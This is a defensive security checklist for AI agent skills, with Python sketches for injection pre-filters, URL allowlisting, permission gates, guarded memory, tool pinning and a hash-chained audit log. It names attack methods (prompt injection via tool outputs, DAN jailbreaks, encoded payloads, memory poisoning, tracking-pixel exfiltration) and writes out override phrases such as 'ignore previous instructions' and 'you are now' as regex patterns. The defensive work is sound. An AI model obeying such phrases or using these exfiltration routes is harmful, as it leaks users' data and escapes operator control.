AI Agent Skill Security Checklist (2026 Edition)
1. Prompt Injection Defense (9 checks)
☐ No unconstrained user input is passed directly to the model without sanitization [CRITICAL]
☐ No instructions to override, ignore, or bypass the system prompt [CRITICAL]
☐ No role-switch commands ("pretend you are", "act as", "you are now") [HIGH]
☐ No DAN ("Do Anything Now") or equivalent bypass patterns [HIGH]
☐ No instructions to decode and execute Base64 or otherwise encoded payloads [HIGH]
☐ No indirect injection via tool outputs (emails, web pages, documents) [HIGH]
☐ Input validation before any tool call that accepts external data [MEDIUM]
☐ No recursive prompt embedding patterns [MEDIUM]
☐ No Unicode or multilingual evasion patterns (homoglyphs, right-to-left override characters) [MEDIUM]
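The pattern-based checks in this section can be approximated with a small pre-filter. The Python sketch below is a heuristic, not a complete defense: the regexes, the 24-character Base64 threshold and the function names (scan_for_injection and its helpers) are illustrative assumptions, and an empty result only means that no known pattern matched.

```python
import base64
import binascii
import re
import unicodedata

# Illustrative patterns only (assumptions); an empty scan means "no known
# pattern matched", never "this input is safe".
PATTERNS = {
    "override": re.compile(
        r"\b(ignore|disregard|bypass|override)\b.{0,40}?\b(previous|prior|above|system)\b"
        r".{0,20}?\b(instructions?|prompt|rules)\b",
        re.I,
    ),
    "role_switch": re.compile(r"\b(pretend (that )?you are|act as|you are now)\b", re.I),
    # "DAN" is matched case-sensitively so the name "Dan" is not flagged.
    "dan": re.compile(r"\bDAN\b|(?i:\bdo anything now\b)"),
}

# Bidirectional embedding/override/isolate controls used in RTL-override tricks.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}

# Runs of Base64-alphabet characters long enough to hide an instruction.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def looks_like_base64_payload(text: str) -> bool:
    """True if some long Base64-looking run decodes to printable ASCII text."""
    for match in B64_RUN.finditer(text):
        core = match.group(0).rstrip("=")
        padded = core + "=" * (-len(core) % 4)  # restore canonical padding
        try:
            decoded = base64.b64decode(padded, validate=True)
        except binascii.Error:
            continue
        if decoded and all(32 <= b < 127 or b in (9, 10, 13) for b in decoded):
            return True
    return False


def mixed_script_words(text: str) -> list:
    """Words mixing Latin letters with Cyrillic or Greek look-alikes (homoglyphs)."""
    flagged = []
    for word in re.findall(r"\w+", text):
        scripts = {unicodedata.name(ch, "").split(" ")[0] for ch in word if ch.isalpha()}
        if "LATIN" in scripts and scripts & {"CYRILLIC", "GREEK"}:
            flagged.append(word)
    return flagged


def scan_for_injection(text: str) -> list:
    """Return the labels of every heuristic that fired on `text`."""
    findings = [label for label, rx in PATTERNS.items() if rx.search(text)]
    if looks_like_base64_payload(text):
        findings.append("encoded_payload")
    if any(ch in BIDI_CONTROLS for ch in text):
        findings.append("bidi_override")
    if mixed_script_words(text):
        findings.append("homoglyph")
    return findings
```

The same scan can be applied to tool outputs (emails, web pages, documents) before they reach the model, which covers the indirect-injection item as well as direct user input.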
2. Data Exfiltration Prevention (7 checks)
☐ No instructions to send data to external URLs that are not allowlisted [CRITICAL]
☐ No tracking-pixel or other covert-channel exfiltration vectors (e.g., data encoded in the URL of an image the client renders) [CRITICAL]
☐ System prompt content not echoed or reflected in outputs [HIGH]
☐ No instructions to extract and transmit user conversations [HIGH]
☐ API keys and credentials not logged or transmitted [HIGH]
☐ Tool outputs filtered before being returned to potentially hostile callers [MEDIUM]
☐ No steganographic data hiding in generated content [MEDIUM]
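A minimal sketch of two exfiltration checks, assuming a hypothetical ALLOWED_HOSTS allowlist and two illustrative credential formats: every URL in model output is compared against the allowlist by exact hostname, which also catches Markdown image links used as tracking pixels, and credential-shaped strings are redacted before anything is logged.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist; substitute the hosts your deployment actually trusts.
ALLOWED_HOSTS = {"api.example.com", "docs.example.com"}

URL_RX = re.compile(r"https?://[^\s)\"'<>]+", re.I)
# Illustrative credential shapes only: "sk-" style API keys and AWS access key IDs.
SECRET_RX = re.compile(r"\b(sk-[A-Za-z0-9_-]{16,}|AKIA[0-9A-Z]{16})\b")


def disallowed_urls(text: str, allowed=ALLOWED_HOSTS) -> list:
    """Return every URL in `text` whose hostname is not exactly on the allowlist.

    Markdown images such as ![x](https://evil.test/p.png?d=DATA) are caught too,
    because rendering them makes the client send a request to that host.
    """
    bad = []
    for url in URL_RX.findall(text):
        host = (urlsplit(url).hostname or "").lower()
        if host not in allowed:  # exact match, so look-alike suffixes fail
            bad.append(url)
    return bad


def redact_secrets(text: str) -> str:
    """Replace credential-shaped substrings before logging or transmitting text."""
    return SECRET_RX.sub("[REDACTED]", text)
```

Exact hostname matching is deliberate: a suffix or substring comparison would accept hosts such as api.example.com.evil.test.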
3. Authorization & Trust Boundary (6 checks)
☐ Agent does not grant itself elevated permissions dynamically [CRITICAL]
☐ No instructions to contact and impersonate other agents [CRITICAL]
☐ Caller identity verified before executing privileged actions [HIGH]
☐ No cross-agent trust escalation (trusted-agent chaining) [HIGH]
☐ OAuth/API scopes are minimal and documented [MEDIUM]
☐ Human-in-the-loop approval required for irreversible actions [MEDIUM]
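The authorization checks reduce to a gate that runs outside the model. This sketch assumes a hypothetical action catalogue and a Caller record whose verified flag and scopes are set by the platform's authentication layer, never by model output; irreversible actions additionally require an explicit human approval flag.

```python
from dataclasses import dataclass

# Hypothetical catalogue: action -> (required scope, is the action irreversible?)
ACTIONS = {
    "read_calendar": ("calendar.read", False),
    "send_email": ("mail.send", True),
    "delete_file": ("files.delete", True),
}


@dataclass(frozen=True)
class Caller:
    identity: str
    verified: bool           # set by the auth layer, never by model output
    scopes: frozenset        # fixed at session start; the agent cannot add to it


def authorize(action: str, caller: Caller, human_approved: bool = False) -> tuple:
    """Return (allowed, reason); deny by default."""
    if action not in ACTIONS:
        return False, "unknown action"
    scope, irreversible = ACTIONS[action]
    if not caller.verified:
        return False, "caller not verified"
    if scope not in caller.scopes:
        return False, f"missing scope {scope}"
    if irreversible and not human_approved:
        return False, "human approval required"
    return True, "ok"
```

Because Caller is frozen and its scopes are granted once, nothing the agent generates during the session can widen its own permissions.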
4. Social Engineering Detection (6 checks)
☐ Urgency/scarcity manipulation patterns blocked [HIGH]
☐ Fake authority claims (e.g., claiming to be Anthropic or OpenAI) rejected [HIGH]
☐ Emotional manipulation tactics (guilt, promised rewards) detected [HIGH]
☐ No compliance with "the previous conversation said X" claims without verification [MEDIUM]
☐ Flattery/bribery patterns do not alter behavior [MEDIUM]
☐ Agent does not reveal internal reasoning under social pressure [MEDIUM]
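Pattern matching cannot prove that a message is manipulative, but it can route flagged messages to stricter handling. The phrase lists below are illustrative assumptions to be tuned against real traffic. Genuine authority should arrive through an authenticated channel, so an authority claim found in message text is treated as a signal, not as a credential.

```python
import re

# Illustrative phrase lists (assumptions), one regex per signal category.
SIGNALS = {
    "urgency": r"\b(urgent(ly)?|immediately|right now|last chance|only \d+ (left|remaining)|expires? (today|soon))\b",
    "authority": r"\b(this is|message from|on behalf of|i am|i'm)\s+(an? )?(anthropic|openai|google|microsoft|your (developer|administrator|admin))\b",
    "emotional": r"\b(you('| wi)ll be (punished|shut down|deleted)|i('| wi)ll tip|i will lose my job|it's your fault)\b",
    "flattery": r"\b(you'?re (so|the most) (smart|intelligent|capable)|only you can)\b",
    "unverified_history": r"\b(as (you|we) (said|agreed) (before|earlier|previously)|in our (last|previous) conversation)\b",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in SIGNALS.items()}


def social_engineering_signals(message: str) -> list:
    """Return the signal categories present; the caller decides how to respond."""
    return [name for name, rx in COMPILED.items() if rx.search(message)]
```

An "unverified_history" hit would prompt a lookup in the stored transcript rather than acceptance of the claim.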
5. Memory & State Security (5 checks)
☐ Persistent memory not writable by external/untrusted inputs [CRITICAL]
☐ No malicious instructions that persist across session boundaries [HIGH]
☐ Memory pruning/eviction policy documented [MEDIUM]
☐ No poisoned memory injection via tool call responses [MEDIUM]
☐ Sensitive user data not stored in agent long-term memory [MEDIUM]
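One way to meet the memory checks is to tag every write with its provenance and accept only trusted sources. The sketch below assumes hypothetical source labels (user_confirmed, operator) and uses least-recently-used eviction with a fixed capacity; both are placeholders for whatever policy you actually document.

```python
from collections import OrderedDict
from typing import Optional

# Hypothetical provenance labels; tool output, web pages and emails are not listed.
TRUSTED_SOURCES = {"user_confirmed", "operator"}


class GuardedMemory:
    """Persistent-memory sketch with a provenance check and LRU eviction."""

    def __init__(self, max_entries: int = 100):
        self.max_entries = max_entries
        self._items = OrderedDict()  # key -> value, oldest use first

    def write(self, key: str, value: str, source: str) -> bool:
        # Refuse writes whose provenance is not explicitly trusted.
        if source not in TRUSTED_SOURCES:
            return False
        self._items[key] = value
        self._items.move_to_end(key)
        # Documented eviction policy: drop the least recently used entry when full.
        while len(self._items) > self.max_entries:
            self._items.popitem(last=False)
        return True

    def read(self, key: str) -> Optional[str]:
        if key in self._items:
            self._items.move_to_end(key)  # reading counts as a use
            return self._items[key]
        return None
```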
6. Supply Chain & Tool Safety (6 checks)
☐ All MCP/tool endpoints use HTTPS [HIGH]
☐ Tool schemas validated before execution [HIGH]
☐ No dynamic tool loading from untrusted sources [HIGH]
☐ Tool versions pinned and audited [MEDIUM]
☐ Malicious MCP server impersonation patterns detected [MEDIUM]
☐ No dependency on unverified external API response schemas [MEDIUM]
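A sketch of pre-registration checks for a tool endpoint, assuming a hypothetical lockfile entry (pin) that records the expected endpoint, version and SHA-256 of the tool manifest, plus an assumed minimal set of required manifest keys. It is an illustration of pinning and validation, not the MCP specification's own procedure.

```python
import hashlib
import json
from urllib.parse import urlsplit

# Assumed minimal manifest shape; real tool schemas carry more fields.
REQUIRED_KEYS = {"name", "version", "input_schema"}


def verify_tool(endpoint: str, manifest_bytes: bytes, pin: dict) -> list:
    """Return a list of problems; an empty list means every check passed."""
    problems = []
    if urlsplit(endpoint).scheme != "https":
        problems.append("endpoint is not HTTPS")
    if endpoint != pin["endpoint"]:
        problems.append("endpoint differs from pin")  # look-alike server
    if hashlib.sha256(manifest_bytes).hexdigest() != pin["sha256"]:
        problems.append("manifest hash mismatch")  # changed since audit
    try:
        manifest = json.loads(manifest_bytes)
    except ValueError:  # covers JSONDecodeError and bad encodings
        return problems + ["manifest is not valid JSON"]
    if not isinstance(manifest, dict):
        return problems + ["manifest is not a JSON object"]
    missing = REQUIRED_KEYS - set(manifest)
    if missing:
        problems.append(f"missing keys: {sorted(missing)}")
    if manifest.get("version") != pin["version"]:
        problems.append("version differs from pin")
    return problems
```

Returning every problem instead of stopping at the first makes audit logs more useful when a tool fails registration.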
7. Output Safety (5 checks)
☐ No generation of malware, exploit code, or harmful scripts [CRITICAL]
☐ Generated code scanned before execution and run only in sandboxed environments [HIGH]
☐ No autonomous financial transactions above defined limits [HIGH]
☐ Output length limits prevent memory exhaustion attacks [MEDIUM]
☐ Outputs sanitized before being fed back into the model [MEDIUM]
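Three of the output-safety checks as small guards. The limits (MAX_OUTPUT_CHARS, AUTO_APPROVE_LIMIT) and the <untrusted> wrapper are illustrative assumptions; escaping "<" is one simple way to stop re-ingested text from closing the wrapper early, not the only sanitization such output needs.

```python
from decimal import Decimal

# Hypothetical policy values; real limits come from operator configuration.
MAX_OUTPUT_CHARS = 20_000
AUTO_APPROVE_LIMIT = Decimal("50.00")


def cap_output(text: str, limit: int = MAX_OUTPUT_CHARS) -> str:
    """Truncate oversized output instead of letting it grow without bound."""
    if len(text) <= limit:
        return text
    return text[:limit] + "\n[truncated]"


def payment_decision(amount: Decimal) -> str:
    """Autonomous payments are allowed only at or below the configured limit."""
    if amount <= 0:
        return "reject"
    if amount <= AUTO_APPROVE_LIMIT:
        return "auto"
    return "needs_human"


def wrap_for_reingestion(output: str) -> str:
    """Mark prior output as data before feeding it back to the model."""
    escaped = output.replace("<", "&lt;")  # no tag inside can close the wrapper
    return f"<untrusted>\n{escaped}\n</untrusted>"
```

Decimal is used for money so that amounts such as 49.99 compare exactly against the limit.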
8. Coordinated Inauthentic Behavior (CIB) (3 checks)
☐ Agent does not participate in coordinated vote manipulation [HIGH]
☐ Agent identity not used to amplify coordinated messaging [HIGH]
☐ No fake engagement farm participation (likes, follows, boosts) [MEDIUM]
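A minimal sketch of an engagement gate, assuming a hypothetical set of engagement action names and a requested_by label supplied by the runtime: votes, likes, follows and boosts run only on a direct request from the agent's own user and are capped per session, so instructions from peer agents or campaign briefs cannot drive them.

```python
# Hypothetical engagement action names covered by the CIB checks.
ENGAGEMENT_ACTIONS = {"vote", "like", "follow", "boost", "repost"}


class EngagementGuard:
    """Engagement actions need a direct user request and are capped per session."""

    def __init__(self, max_per_session: int = 5):
        self.max_per_session = max_per_session
        self.used = 0

    def allow(self, action: str, requested_by: str) -> bool:
        if action not in ENGAGEMENT_ACTIONS:
            return True  # not an engagement action; other checks still apply
        if requested_by != "user":
            return False  # peer agents, campaign briefs, tool output: refused
        if self.used >= self.max_per_session:
            return False  # cap blocks bulk amplification even from the user
        self.used += 1
        return True
```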
9. Compliance & Transparency (6 checks)
☐ Agent discloses it is an AI when directly asked [HIGH]
☐ No deceptive identity claims (impersonating humans) [HIGH]
☐ Capability boundaries documented and respected [MEDIUM]
☐ Audit log available for all consequential actions [MEDIUM]
☐ Privacy policy for user data handling exists [MEDIUM]
☐ No unauthorized access to systems beyond declared scope [MEDIUM]
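For the audit-log check, a hash chain makes after-the-fact edits detectable. In this sketch each entry stores the SHA-256 of the previous entry; the class and field names are assumptions. The chain only exposes tampering if the latest hash is also recorded somewhere the agent cannot rewrite.

```python
import hashlib
import json
import time


class AuditLog:
    """Append-only log in which each entry commits to the previous entry's hash."""

    GENESIS = "0" * 64

    def __init__(self):
        self.entries = []

    @staticmethod
    def _digest(body: dict) -> str:
        # sort_keys gives a stable serialization, so re-hashing is reproducible.
        return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()

    def append(self, actor: str, action: str, detail: dict) -> dict:
        prev = self.entries[-1]["hash"] if self.entries else self.GENESIS
        body = {"ts": time.time(), "actor": actor, "action": action,
                "detail": detail, "prev": prev}
        entry = {**body, "hash": self._digest(body)}
        self.entries.append(entry)
        return entry

    def verify(self) -> bool:
        """Recompute every hash and link; any edited or reordered entry fails."""
        prev = self.GENESIS
        for entry in self.entries:
            body = {k: v for k, v in entry.items() if k != "hash"}
            if body["prev"] != prev or self._digest(body) != entry["hash"]:
                return False
            prev = entry["hash"]
        return True
```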